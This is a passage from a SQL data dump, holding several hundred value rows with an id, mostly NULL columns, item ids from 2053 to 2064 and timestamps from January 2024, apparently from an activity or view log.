(8943, NULL, NULL, 2061, 1, '2024-01-06 05:18:28'),
(8944, NULL, NULL, 2063, 1, '2024-01-06 05:26:15'),
(8945, NULL, NULL, 2060, 1, '2024-01-06 11:19:24'),
(8946, NULL, NULL, 2053, 1, '2024-01-06 15:50:31'),
(8947, NULL, NULL, 2054, 1, '2024-01-06 17:19:10'),
(8948, NULL, NULL, 2054, 1, '2024-01-06 20:59:58'),
(8949, NULL, NULL, 2053, 1, '2024-01-06 21:21:51'),
(8950, NULL, NULL, 2059, 1, '2024-01-07 01:19:50'),
(8951, NULL, NULL, 2054, 1, '2024-01-07 04:50:41'),
(8952, NULL, NULL, 2053, 1, '2024-01-07 05:19:50'),
(8953, NULL, NULL, 2055, 1, '2024-01-07 07:08:59'),
(8954, NULL, NULL, 2059, 1, '2024-01-07 13:19:47'),
(8955, NULL, NULL, 2054, 1, '2024-01-07 15:59:13'),
(8956, NULL, NULL, 2053, 1, '2024-01-07 16:35:44'),
(8957, NULL, NULL, 2058, 1, '2024-01-07 20:57:37'),
(8958, NULL, NULL, 2055, 1, '2024-01-08 01:50:23'),
(8959, NULL, NULL, 2055, 1, '2024-01-08 02:08:14'),
(8960, NULL, NULL, 2053, 1, '2024-01-08 03:43:01'),
(8961, NULL, NULL, 2054, 1, '2024-01-08 04:12:51'),
(8962, NULL, NULL, 2062, 1, '2024-01-08 04:52:00'),
(8963, NULL, NULL, 2059, 1, '2024-01-08 13:46:56'),
(8964, NULL, NULL, 2053, 1, '2024-01-08 16:00:21'),
(8965, NULL, NULL, 2055, 1, '2024-01-08 16:04:27'),
(8966, NULL, NULL, 2054, 1, '2024-01-08 16:53:12'),
(8967, NULL, NULL, 2064, 1, '2024-01-08 20:01:01'),
(8968, NULL, NULL, 2060, 1, '2024-01-08 22:50:49'),
(8969, NULL, NULL, 2055, 1, '2024-01-08 22:50:54'),
(8970, NULL, NULL, 2059, 1, '2024-01-08 22:51:02'),
(8971, NULL, NULL, 2058, 1, '2024-01-08 22:51:06'),
(8972, NULL, NULL, 2054, 1, '2024-01-08 22:51:10'),
(8973, NULL, NULL, 2064, 1, '2024-01-08 22:51:14'),
(8974, NULL, NULL, 2063, 1, '2024-01-08 22:51:20'),
(8975, NULL, NULL, 2062, 1, '2024-01-08 22:51:24'),
(8976, NULL, NULL, 2061, 1, '2024-01-08 22:51:28'),
(8977, NULL, NULL, 2053, 1, '2024-01-09 06:19:53'),
(8978, NULL, NULL, 2055, 1, '2024-01-09 06:32:34'),
(8979, NULL, NULL, 2064, 1, '2024-01-09 08:07:38'),
(8980, NULL, NULL, 2059, 1, '2024-01-09 10:01:14'),
(8981, NULL, NULL, 2064, 1, '2024-01-09 10:10:39'),
(8982, NULL, NULL, 2054, 1, '2024-01-09 10:23:13'),
(8983, NULL, NULL, 2054, 1, '2024-01-09 18:26:40'),
(8984, NULL, NULL, 2055, 1, '2024-01-09 18:51:40'),
(8985, NULL, NULL, 2053, 1, '2024-01-09 23:28:45'),
(8986, NULL, NULL, 2062, 1, '2024-01-10 03:34:42'),
(8987, NULL, NULL, 2061, 1, '2024-01-10 03:42:05'),
(8988, NULL, NULL, 2061, 1, '2024-01-10 03:53:04'),
(8989, NULL, NULL, 2061, 1, '2024-01-10 06:05:07'),
(8990, NULL, NULL, 2058, 1, '2024-01-10 11:15:09'),
(8991, NULL, NULL, 2061, 1, '2024-01-10 16:51:28'),
(8992, NULL, NULL, 2053, 1, '2024-01-10 20:24:29'),
(8993, NULL, NULL, 2064, 1, '2024-01-10 21:13:37'),
(8994, NULL, NULL, 2053, 1, '2024-01-11 04:00:50'),
(8995, NULL, NULL, 2064, 1, '2024-01-11 06:53:53'),
(8996, NULL, NULL, 2061, 1, '2024-01-11 07:03:30'),
(8997, NULL, NULL, 2063, 1, '2024-01-11 08:27:32'),
(8998, NULL, NULL, 2054, 1, '2024-01-11 15:03:30'),
(8999, NULL, NULL, 2061, 1, '2024-01-11 18:06:32'),
(9000, NULL, NULL, 2059, 1, '2024-01-11 18:28:11'),
(9001, NULL, NULL, 2061, 1, '2024-01-11 18:51:55'),
(9002, NULL, NULL, 2064, 1, '2024-01-11 20:17:37'),
(9003, NULL, NULL, 2059, 1, '2024-01-12 05:13:34'),
(9004, NULL, NULL, 2061, 1, '2024-01-12 08:27:42'),
(9005, NULL, NULL, 2061, 1, '2024-01-12 08:27:46'),
(9006, NULL, NULL, 2064, 1, '2024-01-12 08:54:38'),
(9007, NULL, NULL, 2054, 1, '2024-01-12 10:45:27'),
(9008, NULL, NULL, 2064, 1, '2024-01-12 13:33:48'),
(9009, NULL, NULL, 2059, 1, '2024-01-12 13:51:30'),
(9010, NULL, NULL, 2055, 1, '2024-01-12 14:48:45'),
(9011, NULL, NULL, 2053, 1, '2024-01-12 15:33:20'),
(9012, NULL, NULL, 2063, 1, '2024-01-12 19:14:01'),
(9013, NULL, NULL, 2063, 1, '2024-01-12 19:59:51'),
(9014, NULL, NULL, 2055, 1, '2024-01-12 22:20:19'),
(9015, NULL, NULL, 2062, 1, '2024-01-12 23:08:34'),
(9016, NULL, NULL, 2055, 1, '2024-01-13 03:01:16'),
(9017, NULL, NULL, 2060, 1, '2024-01-13 05:03:09'),
(9018, NULL, NULL, 2061, 1, '2024-01-13 05:35:59'),
(9019, NULL, NULL, 2054, 1, '2024-01-13 05:40:18'),
(9020, NULL, NULL, 2058, 1, '2024-01-13 11:05:02'),
(9021, NULL, NULL, 2061, 1, '2024-01-14 04:19:18'),
(9022, NULL, NULL, 2060, 1, '2024-01-14 09:18:44'),
(9023, NULL, NULL, 2063, 1, '2024-01-14 10:57:28'),
(9024, NULL, NULL, 2053, 1, '2024-01-14 12:03:11'),
(9025, NULL, NULL, 2061, 1, '2024-01-14 12:44:17'),
(9026, NULL, NULL, 2064, 1, '2024-01-14 18:50:48'),
(9027, NULL, NULL, 2054, 1, '2024-01-14 18:50:50'),
(9028, NULL, NULL, 2059, 1, '2024-01-14 19:17:52'),
(9029, NULL, NULL, 2064, 1, '2024-01-14 20:48:36'),
(9030, NULL, NULL, 2055, 1, '2024-01-14 21:33:36'),
(9031, NULL, NULL, 2059, 1, '2024-01-14 22:48:46'),
(9032, NULL, NULL, 2061, 1, '2024-01-15 02:17:07'),
(9033, NULL, NULL, 2055, 1, '2024-01-15 02:52:59'),
(9034, NULL, NULL, 2058, 1, '2024-01-15 02:56:58'),
(9035, NULL, NULL, 2053, 1, '2024-01-15 07:38:56'),
(9036, NULL, NULL, 2061, 1, '2024-01-15 09:25:19'),
(9037, NULL, NULL, 2061, 1, '2024-01-15 09:25:42'),
(9038, NULL, NULL, 2055, 1, '2024-01-15 12:45:49'),
(9039, NULL, NULL, 2061, 1, '2024-01-15 15:41:00'),
(9040, NULL, NULL, 2059, 1, '2024-01-15 15:41:00'),
(9041, NULL, NULL, 2060, 1, '2024-01-15 15:41:00'),
(9042, NULL, NULL, 2058, 1, '2024-01-15 15:41:00'),
(9043, NULL, NULL, 2063, 1, '2024-01-15 15:41:03'),
(9044, NULL, NULL, 2064, 1, '2024-01-15 15:41:03'),
(9045, NULL, NULL, 2062, 1, '2024-01-15 15:41:04'),
(9046, NULL, NULL, 2054, 1, '2024-01-15 15:41:04'),
(9047, NULL, NULL, 2055, 1, '2024-01-15 15:41:08'),
(9048, NULL, NULL, 2059, 1, '2024-01-15 15:41:09'),
(9049, NULL, NULL, 2061, 1, '2024-01-15 15:41:09'),
(9050, NULL, NULL, 2058, 1, '2024-01-15 15:41:09'),
(9051, NULL, NULL, 2054, 1, '2024-01-15 15:41:10'),
(9052, NULL, NULL, 2064, 1, '2024-01-15 15:41:36'),
(9053, NULL, NULL, 2055, 1, '2024-01-15 15:41:37'),
(9054, NULL, NULL, 2053, 1, '2024-01-15 15:41:45'),
(9055, NULL, NULL, 2063, 1, '2024-01-15 15:41:59'),
(9056, NULL, NULL, 2062, 1, '2024-01-15 15:41:59'),
(9057, NULL, NULL, 2060, 1, '2024-01-15 15:42:00'),
(9058, NULL, NULL, 2054, 1, '2024-01-15 18:41:32'),
(9059, NULL, NULL, 2061, 1, '2024-01-15 19:44:52'),
(9060, NULL, NULL, 2063, 1, '2024-01-16 00:50:31'),
(9061, NULL, NULL, 2059, 1, '2024-01-16 01:24:05'),
(9062, NULL, NULL, 2058, 1, '2024-01-16 02:13:24'),
(9063, NULL, NULL, 2061, 1, '2024-01-16 02:37:01'),
(9064, NULL, NULL, 2058, 1, '2024-01-16 11:06:50'),
(9065, NULL, NULL, 2058, 1, '2024-01-16 13:37:44'),
(9066, NULL, NULL, 2058, 1, '2024-01-16 13:38:10'),
(9067, NULL, NULL, 2060, 1, '2024-01-16 19:53:18'),
(9068, NULL, NULL, 2062, 1, '2024-01-16 22:56:09'),
(9069, NULL, NULL, 2062, 1, '2024-01-17 00:06:18'),
(9070, NULL, NULL, 2059, 1, '2024-01-17 00:14:45'),
(9071, NULL, NULL, 2055, 1, '2024-01-17 01:42:13'),
(9072, NULL, NULL, 2053, 1, '2024-01-17 02:38:44'),
(9073, NULL, NULL, 2060, 1, '2024-01-17 06:46:19'),
(9074, NULL, NULL, 2063, 1, '2024-01-17 06:57:35'),
(9075, NULL, NULL, 2058, 1, '2024-01-17 07:26:07'),
(9076, NULL, NULL, 2055, 1, '2024-01-17 08:22:46'),
(9077, NULL, NULL, 2061, 1, '2024-01-17 09:53:37'),
(9078, NULL, NULL, 2063, 1, '2024-01-17 10:17:56'),
(9079, NULL, NULL, 2062, 1, '2024-01-17 10:17:59'),
(9080, NULL, NULL, 2060, 1, '2024-01-17 10:18:01'),
(9081, NULL, NULL, 2059, 1, '2024-01-17 10:18:04'),
(9082, NULL, NULL, 2061, 1, '2024-01-17 10:40:24'),
(9083, NULL, NULL, 2062, 1, '2024-01-17 10:41:22'),
(9084, NULL, NULL, 2064, 1, '2024-01-17 11:28:02'),
(9085, NULL, NULL, 2059, 1, '2024-01-17 11:54:26'),
(9086, NULL, NULL, 2063, 1, '2024-01-17 11:54:56'),
(9087, NULL, NULL, 2054, 1, '2024-01-17 12:12:38'),
(9088, NULL, NULL, 2059, 1, '2024-01-17 12:33:30'),
(9089, NULL, NULL, 2064, 1, '2024-01-17 12:50:31'),
(9090, NULL, NULL, 2060, 1, '2024-01-17 16:51:54'),
(9091, NULL, NULL, 2063, 1, '2024-01-17 17:07:43'),
(9092, NULL, NULL, 2060, 1, '2024-01-17 17:49:22'),
(9093, NULL, NULL, 2063, 1, '2024-01-17 18:00:18'),
(9094, NULL, NULL, 2058, 1, '2024-01-17 18:29:31'),
(9095, NULL, NULL, 2055, 1, '2024-01-17 19:25:29'),
(9096, NULL, NULL, 2059, 1, '2024-01-17 20:36:54'),
(9097, NULL, NULL, 2059, 1, '2024-01-17 20:45:48'),
(9098, NULL, NULL, 2061, 1, '2024-01-17 20:57:43'),
(9099, NULL, NULL, 2054, 1, '2024-01-17 21:37:54'),
(9100, NULL, NULL, 2062, 1, '2024-01-17 21:46:15'),
(9101, NULL, NULL, 2059, 1, '2024-01-17 21:49:43'),
(9102, NULL, NULL, 2054, 1, '2024-01-17 22:53:16'),
(9103, NULL, NULL, 2060, 1, '2024-01-17 23:09:59'),
(9104, NULL, NULL, 2063, 1, '2024-01-17 23:21:11'),
(9105, NULL, NULL, 2058, 1, '2024-01-17 23:50:30'),
(9106, NULL, NULL, 2055, 1, '2024-01-18 00:47:42'),
(9107, NULL, NULL, 2060, 1, '2024-01-18 01:33:35'),
(9108, NULL, NULL, 2063, 1, '2024-01-18 01:44:31'),
(9109, NULL, NULL, 2058, 1, '2024-01-18 02:13:00'),
(9110, NULL, NULL, 2055, 1, '2024-01-18 03:08:36'),
(9111, NULL, NULL, 2060, 1, '2024-01-18 03:50:53'),
(9112, NULL, NULL, 2063, 1, '2024-01-18 04:02:44'),
(9113, NULL, NULL, 2060, 1, '2024-01-18 04:51:58'),
(9114, NULL, NULL, 2063, 1, '2024-01-18 05:07:50'),
(9115, NULL, NULL, 2058, 1, '2024-01-18 05:50:38'),
(9116, NULL, NULL, 2055, 1, '2024-01-18 07:14:14'),
(9117, NULL, NULL, 2064, 1, '2024-01-18 08:45:24'),
(9118, NULL, NULL, 2059, 1, '2024-01-18 08:55:55'),
(9119, NULL, NULL, 2061, 1, '2024-01-18 09:30:48'),
(9120, NULL, NULL, 2054, 1, '2024-01-18 09:52:10'),
(9121, NULL, NULL, 2062, 1, '2024-01-18 10:43:15'),
(9122, NULL, NULL, 2054, 1, '2024-01-18 10:45:38'),
(9123, NULL, NULL, 2064, 1, '2024-01-18 12:54:01'),
(9124, NULL, NULL, 2054, 1, '2024-01-18 13:04:40'),
(9125, NULL, NULL, 2059, 1, '2024-01-18 13:35:46'),
(9126, NULL, NULL, 2064, 1, '2024-01-18 14:01:06'),
(9127, NULL, NULL, 2060, 1, '2024-01-18 15:56:28'),
(9128, NULL, NULL, 2063, 1, '2024-01-18 16:08:19'),
(9129, NULL, NULL, 2058, 1, '2024-01-18 16:38:11'),
(9130, NULL, NULL, 2055, 1, '2024-01-18 17:37:33'),
(9131, NULL, NULL, 2061, 1, '2024-01-18 19:12:15'),
(9132, NULL, NULL, 2062, 1, '2024-01-18 20:02:10'),
(9133, NULL, NULL, 2054, 1, '2024-01-18 21:40:27'),
(9134, NULL, NULL, 2059, 1, '2024-01-18 22:03:06'),
(9135, NULL, NULL, 2064, 1, '2024-01-18 22:20:44'),
(9136, NULL, NULL, 2060, 1, '2024-01-18 23:04:28'),
(9137, NULL, NULL, 2060, 1, '2024-01-18 23:47:03'),
(9138, NULL, NULL, 2063, 1, '2024-01-18 23:58:49'),
(9139, NULL, NULL, 2058, 1, '2024-01-19 00:29:15'),
(9140, NULL, NULL, 2059, 1, '2024-01-19 00:59:34'),
(9141, NULL, NULL, 2055, 1, '2024-01-19 01:27:48'),
(9142, NULL, NULL, 2061, 1, '2024-01-19 03:01:24'),
(9143, NULL, NULL, 2058, 1, '2024-01-19 03:15:44'),
(9144, NULL, NULL, 2062, 1, '2024-01-19 03:51:55'),
(9145, NULL, NULL, 2060, 1, '2024-01-19 04:59:57'),
(9146, NULL, NULL, 2063, 1, '2024-01-19 05:11:40'),
(9147, NULL, NULL, 2058, 1, '2024-01-19 05:41:09'),
(9148, NULL, NULL, 2055, 1, '2024-01-19 06:38:59'),
(9149, NULL, NULL, 2061, 1, '2024-01-19 08:09:23'),
(9150, NULL, NULL, 2061, 1, '2024-01-19 08:13:40'),
(9151, NULL, NULL, 2055, 1, '2024-01-19 08:29:01'),
(9152, NULL, NULL, 2062, 1, '2024-01-19 09:04:55'),
(9153, NULL, NULL, 2053, 1, '2024-01-19 09:06:24'),
(9154, NULL, NULL, 2054, 1, '2024-01-19 10:44:40'),
(9155, NULL, NULL, 2059, 1, '2024-01-19 11:08:00'),
(9156, NULL, NULL, 2058, 1, '2024-01-19 11:10:52'),
(9157, NULL, NULL, 2058, 1, '2024-01-19 11:11:13'),
(9158, NULL, NULL, 2064, 1, '2024-01-19 11:26:21'),
(9159, NULL, NULL, 2054, 1, '2024-01-19 12:01:02'),
(9160, NULL, NULL, 2064, 1, '2024-01-19 12:10:32'),
(9161, NULL, NULL, 2064, 1, '2024-01-19 12:34:36'),
(9162, NULL, NULL, 2058, 1, '2024-01-19 14:02:11'),
(9163, NULL, NULL, 2054, 1, '2024-01-19 15:07:01'),
(9164, NULL, NULL, 2059, 1, '2024-01-19 17:56:50'),
(9165, NULL, NULL, 2059, 1, '2024-01-19 18:11:07'),
(9166, NULL, NULL, 2061, 1, '2024-01-19 20:56:06'),
(9167, NULL, NULL, 2053, 1, '2024-01-19 21:43:00'),
(9168, NULL, NULL, 2059, 1, '2024-01-20 01:08:09'),
(9169, NULL, NULL, 2055, 1, '2024-01-20 01:40:13'),
(9170, NULL, NULL, 2060, 1, '2024-01-20 01:55:05'),
(9171, NULL, NULL, 2061, 1, '2024-01-20 01:55:19'),
(9172, NULL, NULL, 2063, 1, '2024-01-20 04:18:59'),
(9173, NULL, NULL, 2055, 1, '2024-01-20 04:39:38'),
(9174, NULL, NULL, 2064, 1, '2024-01-20 06:00:04'),
(9175, NULL, NULL, 2054, 1, '2024-01-20 06:15:55'),
(9176, NULL, NULL, 2062, 1, '2024-01-20 07:21:20'),
(9177, NULL, NULL, 2064, 1, '2024-01-20 08:05:09'),
(9178, NULL, NULL, 2062, 1, '2024-01-20 08:30:09'),
(9179, NULL, NULL, 2059, 1, '2024-01-20 08:32:14'),
(9180, NULL, NULL, 2059, 1, '2024-01-20 10:16:39'),
(9181, NULL, NULL, 2063, 1, '2024-01-20 10:38:56'),
(9182, NULL, NULL, 2059, 1, '2024-01-20 11:17:47'),
(9183, NULL, NULL, 2053, 1, '2024-01-20 11:32:58'),
(9184, NULL, NULL, 2060, 1, '2024-01-20 13:09:06'),
(9185, NULL, NULL, 2054, 1, '2024-01-20 17:07:28'),
(9186, NULL, NULL, 2064, 1, '2024-01-20 17:57:17'),
(9187, NULL, NULL, 2060, 1, '2024-01-20 18:57:00'),
(9188, NULL, NULL, 2053, 1, '2024-01-20 19:25:23'),
(9189, NULL, NULL, 2063, 1, '2024-01-20 20:20:58'),
(9190, NULL, NULL, 2055, 1, '2024-01-21 02:07:43'),
(9191, NULL, NULL, 2054, 1, '2024-01-21 02:11:39'),
(9192, NULL, NULL, 2063, 1, '2024-01-21 02:58:46'),
(9193, NULL, NULL, 2058, 1, '2024-01-21 04:30:02'),
(9194, NULL, NULL, 2063, 1, '2024-01-21 05:38:23'),
(9195, NULL, NULL, 2054, 1, '2024-01-21 06:25:42'),
(9196, NULL, NULL, 2064, 1, '2024-01-21 06:40:53'),
(9197, NULL, NULL, 2053, 1, '2024-01-21 07:25:30'),
(9198, NULL, NULL, 2055, 1, '2024-01-21 15:35:38'),
(9199, NULL, NULL, 2064, 1, '2024-01-21 15:42:23'),
(9200, NULL, NULL, 2063, 1, '2024-01-21 16:04:12'),
(9201, NULL, NULL, 2053, 1, '2024-01-21 17:03:57'),
(9202, NULL, NULL, 2061, 1, '2024-01-21 23:32:09'),
(9203, NULL, NULL, 2060, 1, '2024-01-21 23:32:09'),
(9204, NULL, NULL, 2059, 1, '2024-01-21 23:32:09'),
(9205, NULL, NULL, 2058, 1, '2024-01-21 23:32:09'),
(9206, NULL, NULL, 2054, 1, '2024-01-21 23:32:16'),
(9207, NULL, NULL, 2055, 1, '2024-01-21 23:32:16'),
(9208, NULL, NULL, 2064, 1, '2024-01-21 23:32:26'),
(9209, NULL, NULL, 2063, 1, '2024-01-21 23:32:28'),
(9210, NULL, NULL, 2062, 1, '2024-01-21 23:32:31'),
(9211, NULL, NULL, 2064, 1, '2024-01-22 00:46:32'),
(9212, NULL, NULL, 2063, 1, '2024-01-22 03:25:47'),
(9213, NULL, NULL, 2063, 1, '2024-01-22 04:22:01'),
(9214, NULL, NULL, 2060, 1, '2024-01-22 04:58:10'),
(9215, NULL, NULL, 2061, 1, '2024-01-22 05:36:19'),
(9216, NULL, NULL, 2064, 1, '2024-01-22 05:50:16'),
(9217, NULL, NULL, 2053, 1, '2024-01-22 05:50:18'),
(9218, NULL, NULL, 2063, 1, '2024-01-22 06:30:44'),
(9219, NULL, NULL, 2053, 1, '2024-01-22 07:48:49'),
(9220, NULL, NULL, 2054, 1, '2024-01-22 08:44:49'),
(9221, NULL, NULL, 2059, 1, '2024-01-22 09:08:36'),
(9222, NULL, NULL, 2059, 1, '2024-01-22 09:08:38'),
(9223, 1767, NULL, 2059, 1, '2024-01-22 09:10:40'),
(9224, NULL, NULL, 2062, 1, '2024-01-22 13:14:36'),
(9225, NULL, NULL, 2064, 1, '2024-01-22 15:25:23'),
(9226, NULL, NULL, 2053, 1, '2024-01-22 15:25:32'),
(9227, NULL, NULL, 2062, 1, '2024-01-22 15:25:55'),
(9228, NULL, NULL, 2063, 1, '2024-01-22 15:51:27'),
(9229, NULL, NULL, 2059, 1, '2024-01-22 16:10:56'),
(9230, NULL, NULL, 2063, 1, '2024-01-22 17:51:20'),
(9231, NULL, NULL, 2055, 1, '2024-01-22 18:17:49'),
(9232, NULL, NULL, 2060, 1, '2024-01-22 19:09:17'),
(9233, NULL, NULL, 2054, 1, '2024-01-22 19:41:34'),
(9234, NULL, NULL, 2061, 1, '2024-01-22 20:58:23'),
(9235, NULL, NULL, 2062, 1, '2024-01-23 01:19:08'),
(9236, NULL, NULL, 2063, 1, '2024-01-23 02:02:23'),
(9237, NULL, NULL, 2063, 1, '2024-01-23 04:31:33'),
(9238, NULL, NULL, 2064, 1, '2024-01-23 05:17:37'),
(9239, NULL, NULL, 2054, 1, '2024-01-23 05:32:10'),
(9240, NULL, NULL, 2053, 1, '2024-01-23 06:58:35'),
(9241, NULL, NULL, 2064, 1, '2024-01-23 06:58:38'),
(9242, NULL, NULL, 2064, 1, '2024-01-23 07:56:26'),
(9243, NULL, NULL, 2061, 1, '2024-01-23 12:31:40'),
(9244, NULL, NULL, 2061, 1, '2024-01-23 12:56:41'),
(9245, NULL, NULL, 2054, 1, '2024-01-23 15:03:50'),
(9246, NULL, NULL, 2061, 1, '2024-01-23 15:53:38'),
(9247, NULL, NULL, 2064, 1, '2024-01-23 19:16:54'),
(9248, NULL, NULL, 2053, 1, '2024-01-23 20:26:39'),
(9249, NULL, NULL, 2062, 1, '2024-01-23 23:48:12'),
(9250, NULL, NULL, 2054, 1, '2024-01-24 01:27:03'),
(9251, NULL, NULL, 2061, 1, '2024-01-24 05:45:42'),
(9252, NULL, NULL, 2054, 1, '2024-01-24 06:22:13'),
(9253, NULL, NULL, 2058, 1, '2024-01-24 07:52:57'),
(9254, NULL, NULL, 2061, 1, '2024-01-24 07:52:59'),
(9255, NULL, NULL, 2059, 1, '2024-01-24 07:53:00'),
(9256, NULL, NULL, 2060, 1, '2024-01-24 07:53:02'),
(9257, NULL, NULL, 2062, 1, '2024-01-24 07:53:03'),
(9258, NULL, NULL, 2063, 1, '2024-01-24 07:53:07'),
(9259, NULL, NULL, 2064, 1, '2024-01-24 07:53:10'),
(9260, NULL, NULL, 2055, 1, '2024-01-24 07:53:18'),
(9261, NULL, NULL, 2054, 1, '2024-01-24 07:53:19'),
(9262, NULL, NULL, 2063, 1, '2024-01-24 09:41:33'),
(9263, NULL, NULL, 2054, 1, '2024-01-24 12:15:09'),
(9264, NULL, NULL, 2053, 1, '2024-01-24 16:29:39'),
(9265, NULL, NULL, 2063, 1, '2024-01-24 16:38:42'),
(9266, NULL, NULL, 2063, 1, '2024-01-24 16:38:43'),
(9267, NULL, NULL, 2058, 1, '2024-01-24 16:52:19'),
(9268, NULL, NULL, 2062, 1, '2024-01-24 18:54:50'),
(9269, NULL, NULL, 2054, 1, '2024-01-24 19:08:09'),
(9270, NULL, NULL, 2061, 1, '2024-01-24 21:42:27'),
(9271, NULL, NULL, 2062, 1, '2024-01-24 22:54:20'),
(9272, NULL, NULL, 2060, 1, '2024-01-24 22:58:01'),
(9273, NULL, NULL, 2061, 1, '2024-01-25 00:22:31'),
(9274, NULL, NULL, 2054, 1, '2024-01-25 00:46:43'),
(9275, NULL, NULL, 2055, 1, '2024-01-25 00:46:44'),
(9276, NULL, NULL, 2064, 1, '2024-01-25 00:46:50'),
(9277, NULL, NULL, 2063, 1, '2024-01-25 00:46:53'),
(9278, NULL, NULL, 2062, 1, '2024-01-25 00:46:56'),
(9279, NULL, NULL, 2060, 1, '2024-01-25 00:46:57'),
(9280, NULL, NULL, 2059, 1, '2024-01-25 00:46:58'),
(9281, NULL, NULL, 2061, 1, '2024-01-25 00:47:00'),
(9282, NULL, NULL, 2058, 1, '2024-01-25 00:47:01'),
(9283, NULL, NULL, 2055, 1, '2024-01-25 01:04:35'),
(9284, NULL, NULL, 2060, 1, '2024-01-25 02:08:38'),
(9285, NULL, NULL, 2059, 1, '2024-01-25 04:32:43'),
(9286, NULL, NULL, 2054, 1, '2024-01-25 05:11:14'),
(9287, NULL, NULL, 2064, 1, '2024-01-25 10:01:41'),
(9288, NULL, NULL, 2054, 1, '2024-01-25 11:48:48'),
(9289, NULL, NULL, 2053, 1, '2024-01-25 11:57:24'),
(9290, NULL, NULL, 2061, 1, '2024-01-25 16:10:04'),
(9291, NULL, NULL, 2061, 1, '2024-01-25 16:10:05'),
(9292, NULL, NULL, 2061, 1, '2024-01-25 16:10:06'),
(9293, NULL, NULL, 2061, 1, '2024-01-25 16:10:11'),
(9294, NULL, NULL, 2053, 1, '2024-01-25 16:54:29'),
(9295, NULL, NULL, 2060, 1, '2024-01-25 19:18:11'),
(9296, NULL, NULL, 2054, 1, '2024-01-25 19:40:51'),
(9297, NULL, NULL, 2053, 1, '2024-01-25 20:56:40'),
(9298, NULL, NULL, 2061, 1, '2024-01-25 21:37:20'),
(9299, NULL, NULL, 2061, 1, '2024-01-25 21:37:20'),
(9300, NULL, NULL, 2059, 1, '2024-01-26 00:01:55'),
(9301, NULL, NULL, 2060, 1, '2024-01-26 00:30:09'),
(9302, NULL, NULL, 2058, 1, '2024-01-26 00:53:42'),
(9303, NULL, NULL, 2061, 1, '2024-01-26 00:58:07'),
(9304, NULL, NULL, 2055, 1, '2024-01-26 00:58:59'),
(9305, NULL, NULL, 2064, 1, '2024-01-26 03:17:45'),
(9306, NULL, NULL, 2059, 1, '2024-01-26 03:18:10'),
(9307, NULL, NULL, 2063, 1, '2024-01-26 05:00:08'),
(9308, NULL, NULL, 2054, 1, '2024-01-26 05:48:02'),
(9309, NULL, NULL, 2054, 1, '2024-01-26 06:59:00'),
(9310, NULL, NULL, 2054, 1, '2024-01-26 08:01:51'),
(9311, NULL, NULL, 2062, 1, '2024-01-26 08:18:00'),
(9312, NULL, NULL, 2064, 1, '2024-01-26 09:08:08'),
(9313, NULL, NULL, 2053, 1, '2024-01-26 11:32:48'),
(9314, NULL, NULL, 2064, 1, '2024-01-26 11:55:57'),
(9315, NULL, NULL, 2054, 1, '2024-01-26 12:00:45'),
(9316, NULL, NULL, 2064, 1, '2024-01-26 12:58:23'),
(9317, NULL, NULL, 2063, 1, '2024-01-26 17:14:09'),
(9318, NULL, NULL, 2061, 1, '2024-01-26 17:14:41'),
(9319, NULL, NULL, 2055, 1, '2024-01-26 17:16:10'),
(9320, NULL, NULL, 2054, 1, '2024-01-26 17:50:22'),
(9321, NULL, NULL, 2058, 1, '2024-01-26 17:58:11'),
(9322, NULL, NULL, 2053, 1, '2024-01-26 21:01:05'),
(9323, NULL, NULL, 2064, 1, '2024-01-27 01:47:52'),
(9324, NULL, NULL, 2061, 1, '2024-01-27 02:42:29'),
(9325, NULL, NULL, 2055, 1, '2024-01-27 04:20:15'),
(9326, NULL, NULL, 2061, 1, '2024-01-27 07:01:36'),
(9327, NULL, NULL, 2058, 1, '2024-01-27 08:41:23'),
(9328, NULL, NULL, 2064, 1, '2024-01-27 09:00:58'),
(9329, NULL, NULL, 2063, 1, '2024-01-27 09:46:36'),
(9330, NULL, NULL, 2060, 1, '2024-01-27 14:15:13'),
(9331, NULL, NULL, 2063, 1, '2024-01-27 14:24:09'),
(9332, NULL, NULL, 2058, 1, '2024-01-27 14:46:34'),
(9333, NULL, NULL, 2059, 1, '2024-01-27 15:15:23'),
(9334, NULL, NULL, 2055, 1, '2024-01-27 15:32:37'),
(9335, NULL, NULL, 2061, 1, '2024-01-27 16:55:36'),
(9336, NULL, NULL, 2062, 1, '2024-01-27 17:28:53'),
(9337, NULL, NULL, 2062, 1, '2024-01-27 17:28:55'),
(9338, NULL, NULL, 2064, 1, '2024-01-27 17:31:23'),
(9339, NULL, NULL, 2062, 1, '2024-01-27 17:39:03'),
(9340, NULL, NULL, 2054, 1, '2024-01-27 19:05:37'),
(9341, NULL, NULL, 2059, 1, '2024-01-27 19:24:41'),
(9342, NULL, NULL, 2064, 1, '2024-01-27 19:39:09'),
(9343, NULL, NULL, 2060, 1, '2024-01-27 22:14:29'),
(9344, NULL, NULL, 2063, 1, '2024-01-27 22:23:04'),
(9345, NULL, NULL, 2060, 1, '2024-01-27 23:01:14'),
(9346, NULL, NULL, 2063, 1, '2024-01-27 23:10:01'),
(9347, NULL, NULL, 2060, 1, '2024-01-27 23:56:27'),
(9348, NULL, NULL, 2060, 1, '2024-01-28 00:22:49'),
(9349, NULL, NULL, 2063, 1, '2024-01-28 00:31:00'),
(9350, NULL, NULL, 2058, 1, '2024-01-28 00:52:03'),
(9351, NULL, NULL, 2055, 1, '2024-01-28 01:35:17'),
(9352, NULL, NULL, 2064, 1, '2024-01-28 01:53:31'),
(9353, NULL, NULL, 2064, 1, '2024-01-28 02:01:02'),
(9354, NULL, NULL, 2063, 1, '2024-01-28 02:36:44'),
(9355, NULL, NULL, 2055, 1, '2024-01-28 02:39:14'),
(9356, NULL, NULL, 2061, 1, '2024-01-28 02:55:11'),
(9357, NULL, NULL, 2059, 1, '2024-01-28 03:18:21'),
(9358, NULL, NULL, 2054, 1, '2024-01-28 03:21:15'),
(9359, NULL, NULL, 2062, 1, '2024-01-28 03:36:30'),
(9360, NULL, NULL, 2060, 1, '2024-01-28 04:38:32'),
(9361, NULL, NULL, 2063, 1, '2024-01-28 04:38:34'),
(9362, NULL, NULL, 2058, 1, '2024-01-28 04:38:37'),
(9363, NULL, NULL, 2055, 1, '2024-01-28 04:38:40'),
(9364, NULL, NULL, 2061, 1, '2024-01-28 04:38:47'),
(9365, NULL, NULL, 2062, 1, '2024-01-28 04:38:50'),
(9366, NULL, NULL, 2054, 1, '2024-01-28 04:42:52'),
(9367, NULL, NULL, 2059, 1, '2024-01-28 04:43:47'),
(9368, NULL, NULL, 2064, 1, '2024-01-28 04:44:31'),
(9369, NULL, NULL, 2054, 1, '2024-01-28 04:58:05'),
(9370, NULL, NULL, 2064, 1, '2024-01-28 05:13:51'),
